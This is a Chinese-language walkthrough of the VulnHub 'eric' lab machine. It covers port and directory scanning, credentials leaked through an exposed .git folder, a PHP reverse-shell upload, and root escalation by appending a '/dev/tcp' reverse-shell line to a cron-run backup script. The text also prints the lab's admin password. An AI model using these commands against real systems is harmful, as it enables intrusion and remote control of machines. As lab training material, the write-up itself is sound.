一、靶机信息收集
1、靶机下载地址
https://download.vulnhub.com/sp/eric-v1.0.0.7z
2、扫描靶机IP
3、探测靶机端口、主机、服务版本信息
nmap -sS -sV -A -p- 192.168.31.159
4、靶机目录扫描
扫描一些文件等信息
二、web渗透测试
1、访问靶机IP
2、 拼接访问 admin.php ,一个登录框,尝试sql注入,弱口令等,没有结果
3、查看目录扫描的.git文件
查看下载的源码,发现账号密码
admin:st@mpch0rdt.ightiRu$glo0mappL3
登录 admin 页面
登录成功,是个文件上传页面
4、 kali 生成反弹 shell
locate php-reverse-shell.php
cp /usr/share/webshells/php/php-reverse-shell.php .
修改IP为kaliIP
上传文件,kali开启监听
访问 /upload/php-reverse-shell.php,成功反弹 shell
注意必须要访问upload下的文件
成功反弹
三、提权
1、采用交互式shell
python3 -c "import pty;pty.spawn('/bin/bash')"
注意靶机没有python,但是有python3
2、 在 /home/eric 下发现了 backup.sh,backup.zip,flag.txt 这三个文件
查看 backup.sh
可能是个计划任务,查看一下
cat /etc/crontab
查看一下backup.sh文件
是个全权限
3、写入反弹 shell 的语句
echo 'bash -i >& /dev/tcp/192.168.31.159/1234 0>&1' >> backup.sh
kali 开启监听
等待几分钟后
成功反弹